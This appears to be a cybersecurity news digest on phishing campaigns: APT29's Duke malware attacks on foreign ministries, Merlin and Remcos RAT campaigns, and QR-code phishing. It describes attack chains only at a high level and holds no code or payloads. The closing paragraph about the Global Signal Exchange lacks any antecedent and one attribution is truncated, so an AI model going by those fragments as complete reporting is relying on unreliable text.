NATO-aligned countries' foreign affairs ministries have been targeted by a new phishing campaign deploying a Duke malware variant, which has been linked to Russian state-backed cyberespionage operation APT29, also known as Cozy Bear, BlueBravo, Cloaked Ursa, The Dukes, Midnight Blizzard, and Iron Hemlock, The Hacker News reports.
Attacks commence with emails containing PDF documents leveraging diplomatic lures, which launches a malicious HTML dropper before executing a JavaScript code that then prompts the installation of the Duke malware, according to an EclecticIQ.
Threat actors have also exploited the API of open source chat app Zulip to facilitate command-and-control activities, said researchers, who noted the use of another PDF document for potential reconnaissance efforts.
"It did not contain a payload, but notified the actor if a victim opened the email attachment by receiving a notification through a compromised domain edenparkweddings[.]com," researchers added.
Such attacks come after Ukraine's Computer Emergency Response Team reported the use of the Merlin post-exploitation toolkit in phishing attacks against Ukrainian state organizations.
Insurance and finance industry organizations have been targeted with the Remcos RAT payload as part of a new phishing attack involving the abuse of GitHub comments to insert links redirecting to legitimate open-source tax software repositories instead of unknown repositories, according to a Cofense report.
Malicious QR code messages have also been increasingly leveraged to compromise the sector, with Office 365 used to send over 15,000 of such messages to education entities, a Microsoft Threat Intelligence report showed.
Aside from featuring over 40 million signals from the DNS Research Federation's data platform and the Global Anti-Scam Alliance's comprehensive stakeholder network, the Global Signal Exchange will also contain more than 100,000 bad merchant URLs and one million scam signals from Google.